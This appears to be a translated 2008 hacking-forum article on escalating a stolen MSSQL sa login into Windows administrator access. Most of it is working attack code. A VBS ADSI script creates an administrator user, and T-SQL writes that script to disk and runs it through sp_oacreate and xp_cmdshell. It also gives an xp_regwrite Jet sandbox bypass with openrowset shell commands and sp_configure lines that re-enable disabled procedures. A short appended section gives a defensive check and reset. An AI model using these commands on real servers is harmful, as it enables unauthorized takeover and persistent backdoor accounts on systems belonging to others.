The newest ways of using MSSQL SA privileges
  Added: 08/12/2008   Published: 08/12/2008   Hits: 24
After obtaining the SA password, you often find that the server administrator (or "the previous visitor") has restricted the use of net.exe and net1.exe, so an administrator account cannot be added with them. VBS can use the WinNT provider of Active Directory Service Interfaces (ADSI), which manages local resources; with it an administrator can be added without relying on CMD commands. The code is as follows:

    set wsnetwork=CreateObject("WSCRIPT.NETWORK")
    os="WinNT://"&wsnetwork.ComputerName
    Set ob=GetObject(os)                           'obtain the ADSI interface and bind
    Set oe=GetObject(os&"/Administrators,group")   'the Administrators group
    Set od=ob.Create("user","test")                'create the user
    od.SetPassword "1234"                          'set the password
    od.SetInfo                                     'save
    Set of=GetObject(os&"/test",user)              'obtain the user
    oe.add os&"/test"                              'add the user to the group

Save the code above as 1.vbs and run it with the command "cscript 1.vbs"; this adds a user named test with the password 1234 to the system. Concretely, run the following in Query Analyzer:

    declare @o int, @f int, @t int, @ret int
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'os="WinNT://"&wsnetwork.ComputerName'
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set ob=GetObject(os)'
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set oe=GetObject(os&"/Administrators,group")'
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set od=ob.Create("user","test")'
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'od.SetPassword "1234"'
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'od.SetInfo'
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set of=GetObject(os&"/test",user)'
    exec @ret = sp_oamethod @f, 'writeline', NULL, 'oe.add os&"/test"'

After the statements above have run, run the following line. It must be run on its own, not in the same batch as the statements above, otherwise you get the prompt that "c:\1.vbs cannot be accessed because it is being used by another program" and the user is not added:

    exec master..xp_cmdshell 'cscript c:\1.vbs'

If the user was not added, the password 1234 may be too simple and not meet the server's password-complexity policy; consider setting a complex password and testing again.

You can also use echo to write the code into 1.vbs, in this format:

    exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK") >>1.vbs'

However, for some reason every line containing the "&" character cannot be written into 1.vbs this way; interested friends can try to solve this.

Using the Jet sandbox mode avoids the trouble that extended stored procedures such as xp_cmdshell and their related DLLs bring. For security reasons the sandbox mode is not open in the system's default configuration, so it has to be opened with xp_regwrite:

    Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1

Then run the sandbox commands, which add a user named test with the password 1234 to the system:

    select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net user test 1234 /add")')
    select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net localgroup administrators test /add")')

The path differs by operating system and must be adjusted accordingly:

    NT/2K: c:\winnt\system32\
    XP/2003: c:\windows\system32\

In addition, in Microsoft SQL Server 2005 some extended stored procedures are closed by default and must be opened with commands.

Open xp_cmdshell:

    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Open OPENROWSET:

    exec sp_configure 'show advanced options', 1; RECONFIGURE;
    exec sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE;

Open sp_oacreate:

    exec sp_configure 'show advanced options', 1; RECONFIGURE;
    exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
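As an added administrator-side check, not part of the original article, the following T-SQL reports whether the three server options the article relies on are enabled and reads back the Jet SandBoxMode value the article writes, then turns the options back off. It assumes sysadmin rights on SQL Server 2005 or later (where sys.configurations exists) and uses the undocumented xp_regread extended procedure.

```sql
-- Added hardening check, not from the original article.
-- Assumes SQL Server 2005+ and sysadmin rights.

-- 1. Which of the options the article enables are currently on?
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');

-- 2. Jet SandBoxMode as set by the article's xp_regwrite call.
--    3 means the sandbox is enforced at all times; anything else deserves a look.
DECLARE @sandbox int;
EXEC master.dbo.xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SOFTWARE\Microsoft\Jet\4.0\Engines',
    @value_name = 'SandBoxMode',
    @value      = @sandbox OUTPUT;
SELECT @sandbox AS SandBoxMode;

-- 3. Restore the SQL Server 2005 defaults (all three off) and hide advanced options again.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

Every sp_configure change also writes a "Configuration option '...' changed from 0 to 1" line to the SQL Server error log, which is the simplest place to alert on these options being switched on.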